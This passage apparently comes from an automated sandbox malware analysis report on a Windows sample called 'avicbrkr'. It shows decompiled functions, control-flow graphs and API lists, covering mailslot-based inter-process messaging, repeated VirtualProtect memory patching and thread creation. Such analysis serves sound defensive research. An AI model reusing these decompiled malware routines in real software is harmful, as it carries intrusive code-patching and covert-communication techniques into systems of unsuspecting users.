                      • GetLastError.KERNEL32(?,?,00000000), ref: 00401708
                      • CloseHandle.KERNEL32(?), ref: 00401714
                      • GetLastError.KERNEL32(?,00000000), ref: 0040171D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: Thread$CloseCodeCreateErrorExitHandleLastObjectSingleWait$AllocTerminateVirtual
                      • String ID:
                      • API String ID: 2781294418-0
                      • Opcode ID: 8c03ab36042ed6f52e850f07250f175f27c204e4b6659917796c1b471e7c79f0
                      • Instruction ID: 87f03f665843337bf68fe172ccf2670ca8cb997910dba5155611d0e3495f720c
                      • Opcode Fuzzy Hash: 8c03ab36042ed6f52e850f07250f175f27c204e4b6659917796c1b471e7c79f0
                      • Instruction Fuzzy Hash: 2E31FC71800209FBDB11DFA5DD858EE7BBCEB49350B208137FA05F61A0D6749A44DBA8
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90sleepfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 104 4010fb-401104 105 401107-401124 CreateFileA 104->105 106 401126-401137 GetLastError Sleep 105->106 107 401139 105->107 108 40113c-401140 106->108 107->108 108->105 109 401142-401145 108->109 110 4011ea-4011ef 109->110 111 40114b-40115f call 40172f 109->111 114 401161-401169 111->114 115 4011da 111->115 116 40116e-401173 114->116 117 4011e1-4011e4 CloseHandle 115->117 118 401175 116->118 119 401178-401192 WriteFile 116->119 117->110 118->119 120 401194-40119c 119->120 121 4011a8-4011b4 GetLastError 119->121 122 4011b6-4011c0 Sleep 120->122 123 40119e-4011a0 120->123 121->122 124 4011c2-4011d8 memset call 401207 121->124 122->116 122->124 123->122 125 4011a2-4011a6 123->125 124->117 125->122
                      C-Code - Quality: 94%
                      			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040172F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















                      0x004010fb
                      0x004010fb
                      0x00401104
                      0x00401107
                      0x00401118
                      0x0040111e
                      0x00401124
                      0x00401139
                      0x00401126
                      0x0040112e
                      0x00401131
                      0x00401131
                      0x0040113c
                      0x00401145
                      0x004011ea
                      0x004011ef
                      0x004011ef
                      0x00401158
                      0x0040115f
                      0x004011da
                      0x004011e1
                      0x004011e4
                      0x00000000
                      0x004011e4
                      0x00401161
                      0x00401164
                      0x00401165
                      0x00401168
                      0x0040116e
                      0x0040116e
                      0x00401173
                      0x00401175
                      0x00401175
                      0x0040118a
                      0x00401192
                      0x004011a8
                      0x004011ae
                      0x004011b4
                      0x00000000
                      0x00000000
                      0x00401194
                      0x00401194
                      0x00401197
                      0x0040119a
                      0x0040119c
                      0x004011a2
                      0x004011a3
                      0x004011a3
                      0x0040119c
                      0x004011b8
                      0x004011be
                      0x004011c8
                      0x004011d1
                      0x00000000

                      APIs
                      • CreateFileA.KERNELBASE(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
                      • GetLastError.KERNEL32 ref: 00401126
                      • Sleep.KERNEL32(00000064), ref: 00401131
                        • Part of subcall function 0040172F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401818
                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040118A
                      • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
                      • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
                      • memset.NTDLL ref: 004011C8
                        • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401599,00401599), ref: 00401213
                      • CloseHandle.KERNEL32(?), ref: 004011E4
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorFileLastSleep$CloseCreateFreeHandleHeapWritememcpymemset
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 990326202-622273203
                      • Opcode ID: 4bdae630b9fcbe0f8a23b9428ee12f3568433213e803cd86aea26540267a1728
                      • Instruction ID: 3a6e4c3a0fa27cd688e5fef70a244e9f952e20069a63f9e9082676df5e7f771b
                      • Opcode Fuzzy Hash: 4bdae630b9fcbe0f8a23b9428ee12f3568433213e803cd86aea26540267a1728
                      • Instruction Fuzzy Hash: 47314D75E00218ABDB15DFA5DD88A9EBBB8AF08354F104077F601BA2E0D7749A40CB59
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00387C56, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 126memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 128 387c56-387c84 call 395c00 call 38a2fc 133 387c8a-387ca0 VirtualProtect 128->133 134 387dbf-387dc6 128->134 136 387ca6-387cd3 call 387b93 133->136 137 387db7-387ddc GetLastError 133->137 135 387ddf-387deb call 395c3b 134->135 136->135 143 387cd9-387ce0 136->143 137->135 144 387d3b-387d60 VirtualProtect 143->144 145 387ce2-387ce9 143->145 147 387d6b-387da8 RtlEnterCriticalSection RtlLeaveCriticalSection call 38885b 144->147 148 387d62-387d66 call 38783a 144->148 145->144 146 387ceb-387cfa call 387b3c 145->146 146->144 155 387cfc-387d09 VirtualProtect 146->155 152 387dad-387daf 147->152 148->147 152->135 154 387db1-387db5 152->154 154->135 155->144 156 387d0b-387d26 155->156 157 387d28 156->157 158 387d2f-387d39 VirtualProtect 156->158 157->158 158->144
                      APIs
                        • Part of subcall function 0038A2FC: lstrcmp.KERNEL32(?,00000000), ref: 0038A3B4
                        • Part of subcall function 0038A2FC: lstrlen.KERNEL32(?,00000000,00000000,?), ref: 0038A3BF
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,0038819A,00399540,0000001C,00387E1E,00000002,00000000,00000001,00000000,?,00000000), ref: 00387C9C
                      • GetLastError.KERNEL32(?,0038819A,00000000,?,?,?,0037B5E2,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC,?), ref: 00387DB7
                        • Part of subcall function 00387B93: lstrlen.KERNEL32(?,?,?,?,0037B5E2), ref: 00387BCB
                        • Part of subcall function 00387B93: lstrcpy.KERNEL32(00000000,?), ref: 00387BE2
                        • Part of subcall function 00387B93: StrChrA.SHLWAPI(00000000,0000002E), ref: 00387BEB
                        • Part of subcall function 00387B93: GetModuleHandleA.KERNEL32(00000000,?,0037B5E2), ref: 00387C09
                      • VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,0037B5E2,?,0038819A,00000000,?,?,?,0037B5E2,00000000), ref: 00387D05
                      • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,0038819A,00000000,?,?), ref: 00387D39
                      • VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,0037B5E2,?,0038819A,00000000,?,?,?,0037B5E2,00000000,00000000,00000000), ref: 00387D50
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 00387D71
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387D8F
                        • Part of subcall function 0038885B: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,H}*), ref: 00388872
                        • Part of subcall function 0038783A: lstrlen.KERNEL32(00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 0038786C
                        • Part of subcall function 0038783A: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 00387886
                        • Part of subcall function 0038783A: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 003878B9
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$lstrlen$CriticalSection$EnterErrorHandleInformationLastLeaveModuleProcessQuerylstrcmplstrcpy
                      • String ID: H}*
                      • API String ID: 2045153472-3236088583
                      • Opcode ID: 5c006053013e9fcb676a8417a4361ed054e67cc1bd191c29f42f2a90d01e2520
                      • Instruction ID: 2659f97271664cbc2102d09913fd3152a9dba1b91fcffa22764e4894453ebb70
                      • Opcode Fuzzy Hash: 5c006053013e9fcb676a8417a4361ed054e67cc1bd191c29f42f2a90d01e2520
                      • Instruction Fuzzy Hash: 48515B71900709EFCB12EF69C885AA9BBB9FF08310F15815AF914AB290D770ED50CFA4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401034, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72memorysleepfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 159 401034-40105a CreateMailslotA 160 4010d6-4010df GetLastError 159->160 161 40105c-401066 call 4011f2 159->161 162 4010e2-4010e6 160->162 167 4010c4 161->167 168 401068-40107e ReadFile 161->168 164 4010f1-4010f8 162->164 165 4010e8-4010ee 162->165 165->164 169 4010cb-4010d4 CloseHandle 167->169 170 401080-40109c RtlReAllocateHeap 168->170 171 4010a4-4010b0 GetLastError 168->171 169->162 170->167 173 40109e-4010a2 170->173 171->169 172 4010b2 171->172 174 4010b5-4010c0 Sleep 172->174 173->174 174->168 175 4010c2 174->175 175->169
                      C-Code - Quality: 100%
                      			E00401034(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t35;
				long _t36;

				_t36 = 0;
				_v12 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v20 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t35 = _a4;
					_v8 = _t25;
				} else {
					_t35 = E004011F2(0x1000);
					if(_t35 == 0) {
						L9:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t35 + _t36, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L7;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t36 = _t36 + _v16;
								_t34 = RtlReAllocateHeap( *0x40305c, 0, _t35, _v12); // executed
								_t35 = _t34;
								if(_t35 == 0) {
									goto L9;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L7;
								}
							}
							goto L10;
							L7:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L10:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t35;
					 *((intOrPtr*)(_t27 + 8)) = _t36;
				}
				return _v8;
			}















                      0x0040103d
                      0x0040104c
                      0x0040104f
                      0x00401055
                      0x0040105a
                      0x004010d6
                      0x004010dc
                      0x004010df
                      0x0040105c
                      0x00401062
                      0x00401066
                      0x004010c4
                      0x004010c4
                      0x00401068
                      0x00401068
                      0x00401076
                      0x0040107e
                      0x004010a4
                      0x004010aa
                      0x004010b0
                      0x004010b2
                      0x00000000
                      0x004010b2
                      0x00401080
                      0x00401080
                      0x00401086
                      0x00401092
                      0x00401098
                      0x0040109c
                      0x00000000
                      0x0040109e
                      0x0040109e
                      0x00000000
                      0x0040109e
                      0x0040109c
                      0x00000000
                      0x004010b5
                      0x004010b7
                      0x004010bd
                      0x004010c2
                      0x004010cb
                      0x004010ce
                      0x004010ce
                      0x004010e6
                      0x004010e8
                      0x004010eb
                      0x004010ee
                      0x004010ee
                      0x004010f8

                      APIs
                      • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
                      • GetLastError.KERNEL32 ref: 004010D6
                        • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401076
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?), ref: 00401092
                      • GetLastError.KERNEL32 ref: 004010A4
                      • Sleep.KERNELBASE(00000064), ref: 004010B7
                      • CloseHandle.KERNEL32(?), ref: 004010CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateErrorHeapLast$CloseCreateFileHandleMailslotReadSleep
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 3691270289-622273203
                      • Opcode ID: bb05a7b30b9f04e70e584028e2bcf9ee6f571bc0d10fb0b264c7aa77a4cc3123
                      • Instruction ID: d23dc2a85cadddd41d6abb100f9dc413ece9bb957419d815b73429d736441217
                      • Opcode Fuzzy Hash: bb05a7b30b9f04e70e584028e2bcf9ee6f571bc0d10fb0b264c7aa77a4cc3123
                      • Instruction Fuzzy Hash: 9D214A70D01358EBDB109F95CE88A9EBBB8FB44351F108076E641B22A0D7B48A84DA58
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003879CC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 207 3879cc-3879e9 call 395c00 call 387774 212 3879eb-3879ed 207->212 213 3879f2-387a00 call 3877a0 207->213 214 387b34-387b39 call 395c3b 212->214 219 387b31 213->219 220 387a06-387a0e 213->220 219->214 221 387a10 220->221 222 387a13-387a2f call 38a1bf 220->222 221->222 225 387a4c-387a61 VirtualProtect 222->225 226 387a31-387a46 call 38a265 222->226 228 387aef-387af8 GetLastError 225->228 229 387a67-387a6e 225->229 226->225 234 387afa 226->234 233 387b01-387b29 228->233 231 387a70-387a74 229->231 232 387a77-387aa2 VirtualProtect 229->232 231->232 235 387aad-387ae9 RtlEnterCriticalSection RtlLeaveCriticalSection 232->235 236 387aa4-387aa8 call 38783a 232->236 233->219 240 387b2b-387b2c call 3712ff 233->240 234->233 235->233 239 387aeb-387aed 235->239 236->235 239->233 240->219
                      APIs
                        • Part of subcall function 003877A0: GetLastError.KERNEL32(00000024,?,003879FB,00000000,00000000,00399550,00000014,003881BE,?,00000000,?,?,00000000,0039C828,00000000), ref: 003877CD
                        • Part of subcall function 0038A1BF: lstrcmpi.KERNEL32(?,00000000), ref: 0038A1F4
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00399550,00000014,003881BE,?,00000000,?), ref: 00387A59
                      • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,0037B5E2), ref: 00387A93
                      • RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387ADA
                        • Part of subcall function 0038783A: lstrlen.KERNEL32(00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 0038786C
                        • Part of subcall function 0038783A: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,0037B5E2,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 00387886
                        • Part of subcall function 0038783A: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,00387AAD,00000000,?,0037B5E2), ref: 003878B9
                      • RtlEnterCriticalSection.NTDLL(H}*), ref: 00387ABC
                      • GetLastError.KERNEL32(?,0037B5E2), ref: 00387AEF
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 0038A265: lstrcmpi.KERNEL32(?,00000000), ref: 0038A2A9
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$CriticalErrorLastSectionlstrcmpi$EnterFreeHeapLeavelstrlen
                      • String ID: H}*
                      • API String ID: 1219094055-3236088583
                      • Opcode ID: d4787955ec77940077ef61f9b6cd6b27f148e7615201abc845d32ec0fdd6f5b0
                      • Instruction ID: 61bec83853cc1424f1af1a349819b66bc3e323936fcd64de170e1e510a41dc56
                      • Opcode Fuzzy Hash: d4787955ec77940077ef61f9b6cd6b27f148e7615201abc845d32ec0fdd6f5b0
                      • Instruction Fuzzy Hash: C3416A71904709EFDB13EF65C885BADBBBABF04310F2181A5E9149B251D774EA40CFA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00388461, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 89memorystringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 242 388461-38849b lstrcpyn call 38a536 245 3884a1-3884a6 242->245 246 388556 242->246 248 3884ac-3884b0 245->248 249 38854d-388554 245->249 247 38855d-388564 246->247 248->249 250 3884b6-3884e4 VirtualAlloc 248->250 249->247 251 388544-38854b 250->251 252 3884e6-38851a call 3820d9 250->252 251->247 255 38851c-38852b memcpy 252->255 256 38852d 252->256 257 388534-388542 VirtualFree 255->257 256->257 257->247
                      APIs
                      • lstrcpyn.KERNEL32(00000000,003994A4,00000008), ref: 00388486
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 003884DA
                      • memcpy.NTDLL(00000000,00000000,00000000,00000000,?,00000001), ref: 00388523
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000001), ref: 0038853C
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Virtual$AllocFreelstrcpynmemcpy
                      • String ID: Feb 28 2019$pnls$pnls
                      • API String ID: 2133416149-3706025122
                      • Opcode ID: 13d11c992a9b8a5ad22942ef3626a522f3bc962a2ff6660602a1210ef424bef8
                      • Instruction ID: 73777bd5cacc1fec08d90e0566eb44f9985500e180ec2494996654fdd6aa4e0a
                      • Opcode Fuzzy Hash: 13d11c992a9b8a5ad22942ef3626a522f3bc962a2ff6660602a1210ef424bef8
                      • Instruction Fuzzy Hash: CD310B72900304EBDF02EFA8C845B9E7775FF46704F548499E9056F286CB71DA05CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00631096, Relevance: 10.6, APIs: 7, Instructions: 67memorythreadCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 270 631096-6310a5 271 631107-631114 InterlockedDecrement 270->271 272 6310a7-6310a8 270->272 273 631157-63115c 271->273 275 631116-63111c 271->275 272->273 274 6310ae-6310bb InterlockedIncrement 272->274 274->273 276 6310c1-6310d5 HeapCreate 274->276 277 63114b-631151 HeapDestroy 275->277 278 63111e-63111f 275->278 279 631103-631105 276->279 280 6310d7-631101 call 631000 CreateThread 276->280 277->273 281 631124-631135 SleepEx 278->281 279->273 280->273 280->279 283 631137-63113c 281->283 284 63113e-63114a CloseHandle 281->284 283->281 283->284 284->277
                      APIs
                      • InterlockedIncrement.KERNEL32(006375C8), ref: 006310B3
                      • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 006310C8
                        • Part of subcall function 00631000: memcpy.NTDLL(006376E0,?,0000000C,00636240,0000000C,006310EC,?,00000000,?), ref: 0063103B
                      • CreateThread.KERNELBASE(00000000,00000000,Function_0000005E,00000000,?,00000000), ref: 006310F4
                      • InterlockedDecrement.KERNEL32(006375C8), ref: 0063110C
                      • SleepEx.KERNEL32(00000064,00000001), ref: 00631128
                      • CloseHandle.KERNEL32 ref: 00631144
                      • HeapDestroy.KERNEL32 ref: 00631151
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThreadmemcpy
                      • String ID:
                      • API String ID: 820571241-0
                      • Opcode ID: 6a3a94c73a2aa233a839d591f244ced6e92b9d2335bd368b2ea39171ecf1377d
                      • Instruction ID: ceed142d0c2053d0532ae87e84e5aa73ff9d8bdba6e6c4eb749f47b197d5e176
                      • Opcode Fuzzy Hash: 6a3a94c73a2aa233a839d591f244ced6e92b9d2335bd368b2ea39171ecf1377d
                      • Instruction Fuzzy Hash: 9211E776605215BFCB345F28ED8AADA7BABFB07B65F009025F605C6360CB709810CAE4
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64memorysleepfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 286 401033-40105a CreateMailslotA 288 4010d6-4010df GetLastError 286->288 289 40105c-401066 call 4011f2 286->289 290 4010e2-4010e6 288->290 295 4010c4 289->295 296 401068-40107e ReadFile 289->296 292 4010f1-4010f8 290->292 293 4010e8-4010ee 290->293 293->292 297 4010cb-4010d4 CloseHandle 295->297 298 401080-40109c RtlReAllocateHeap 296->298 299 4010a4-4010b0 GetLastError 296->299 297->290 298->295 301 40109e-4010a2 298->301 299->297 300 4010b2 299->300 302 4010b5-4010c0 Sleep 300->302 301->302 302->296 303 4010c2 302->303 303->297
                      C-Code - Quality: 96%
                      			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = RtlReAllocateHeap( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















                      0x00401033
                      0x0040103d
                      0x0040104c
                      0x0040104f
                      0x00401055
                      0x0040105a
                      0x004010d6
                      0x004010dc
                      0x004010df
                      0x0040105c
                      0x00401062
                      0x00401066
                      0x004010c4
                      0x004010c4
                      0x00401068
                      0x00401068
                      0x00401076
                      0x0040107e
                      0x004010a4
                      0x004010aa
                      0x004010b0
                      0x004010b2
                      0x00000000
                      0x004010b2
                      0x00401080
                      0x00401080
                      0x00401086
                      0x00401092
                      0x00401098
                      0x0040109c
                      0x00000000
                      0x0040109e
                      0x0040109e
                      0x00000000
                      0x0040109e
                      0x0040109c
                      0x00000000
                      0x004010b5
                      0x004010b7
                      0x004010bd
                      0x004010c2
                      0x004010cb
                      0x004010ce
                      0x004010ce
                      0x004010e6
                      0x004010e8
                      0x004010eb
                      0x004010ee
                      0x004010ee
                      0x004010f8

                      APIs
                      • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
                      • GetLastError.KERNEL32 ref: 004010D6
                        • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      • ReadFile.KERNELBASE(?,?,00001000,?,00000000), ref: 00401076
                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?), ref: 00401092
                      • GetLastError.KERNEL32 ref: 004010A4
                      • Sleep.KERNELBASE(00000064), ref: 004010B7
                      • CloseHandle.KERNEL32(?), ref: 004010CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp Download File
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateErrorHeapLast$CloseCreateFileHandleMailslotReadSleep
                      • String ID: \\.\mailslot\msl0
                      • API String ID: 3691270289-622273203
                      • Opcode ID: d83491b128b874970635f2c91288b0718e6b26e4eb36ae321374187c494f20b3
                      • Instruction ID: 301bfff34d3d9a42d24819e7bb6be00bc8a8a456f07860fe6218443ba64bb720
                      • Opcode Fuzzy Hash: d83491b128b874970635f2c91288b0718e6b26e4eb36ae321374187c494f20b3
                      • Instruction Fuzzy Hash: D3116A31901358ABDB219F95CD88BAFBBB8FB44750F108077F640B21E0D7B48980CA68
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00634365, Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 105memorystringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 304 634365-6343a6 lstrcpyn 305 6343aa-6343af 304->305 306 6343b1-6343b7 305->306 307 6343bb-6343bf 305->307 306->307 310 6343b9 306->310 308 6343c1-6343c3 307->308 309 6343c5-6343c7 307->309 308->305 308->309 311 634482 309->311 312 6343cd-6343d2 309->312 310->307 315 634489-634490 311->315 313 634479-634480 312->313 314 6343d8-6343dc 312->314 313->315 314->313 316 6343e2-634410 VirtualAlloc 314->316 317 634412-634446 call 634b60 316->317 318 634470-634477 316->318 321 634459 317->321 322 634448-634457 memcpy 317->322 318->315 323 634460-63446e VirtualFree 321->323 322->323 323->315
                      APIs
                      • lstrcpyn.KERNEL32(006316FE,006361F4,00000008,0063618C,0000000C,00000000,?,?,?,006316FE,?,?,00637614), ref: 00634393
                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,006316FE,?,?,00637614), ref: 00634406
                      • memcpy.NTDLL(?,00000000,?,?,00637614,00000001,?,?,?,006316FE,?,?,00637614), ref: 0063444F
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00637614,00000001,?,?,?,006316FE,?), ref: 00634468
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Virtual$AllocFreelstrcpynmemcpy
